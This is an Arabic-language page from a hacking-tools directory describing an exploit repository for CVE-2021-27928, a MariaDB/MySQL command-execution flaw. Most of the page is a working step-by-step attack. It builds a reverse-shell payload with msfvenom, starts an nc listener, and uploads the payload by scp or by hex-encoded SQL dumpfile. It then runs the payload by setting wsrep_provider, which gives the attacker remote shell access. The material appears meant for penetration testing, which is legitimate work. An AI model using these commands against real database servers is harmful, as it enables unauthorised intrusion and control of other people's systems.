Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-27928 — CVE-2021-27928 MariaDB/MySQL-'wsrep provider' ثغرة حقن الأوامر | Kitploit
أدوات/GitHubGitHub/al1ex/cve-2021-27928
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالقيادة والسيطرةتطوير الحمولاتأمن قواعد البيانات
GitHubal1ex/cve-2021-27928

CVE-2021-27928

CVE-2021-27928 MariaDB/MySQL-'wsrep provider' ثغرة حقن الأوامر

عرض المستودع
63133منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

المعلومات

root@kitploit:~
عنوان الثغرة: MariaDB 10.2 /MySQL - تنفيذ أوامر نظام 'wsrep_provider'
التاريخ: 18/03/2021
مؤلف الثغرة: Central InfoSec
الإصدارات المتأثرة:
	MariaDB 10.2 قبل 10.2.37
	10.3 قبل 10.3.28
	10.4 قبل 10.4.18
	10.5 قبل 10.5.9
Percona Server حتى 2021-03-03؛ وتصحيح wsrep حتى 2021-03-03 لـ MySQL
تم الاختبار على: Linux
CVE: CVE-2021-27928

كيفية الاستغلال

الخطوة 1: إنشاء حمولة الـ reverse shell

root@kitploit:~
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf-so -o CVE-2021-27928.so

payload

الخطوة 2: تشغيل مستمع

root@kitploit:~
nc -lnvp <port>

nc

الخطوة 3: نسخ الحمولة إلى الجهاز المستهدف

عبر SCP

root@kitploit:~
scp CVE-2021-27928.so <user>@<ip>:/tmp/CVE-2021-27928.so

عبر Dumpfile

root@kitploit:~
python3 -c 'print(open("CVE-2021-27928.so", "rb").read().hex())'
mysql -u <user> -p -h <ip>
SELECT UNHEX('PYTHON_OUTPUT') into dumpfile '/tmp/CVE-2021-27928.so';

الخطوة 4: تنفيذ الحمولة

root@kitploit:~
mysql -u <user> -p -h <ip>
SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";

shell

المراجع

https://www.exploit-db.com/exploits/49765

https://jira.mariadb.org/browse/MDEV-25179

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27928

تنزيل الأداة